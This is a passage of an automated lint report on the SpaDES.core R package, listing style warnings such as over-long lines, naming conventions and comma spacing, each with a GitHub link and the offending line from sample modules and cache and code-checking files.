pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   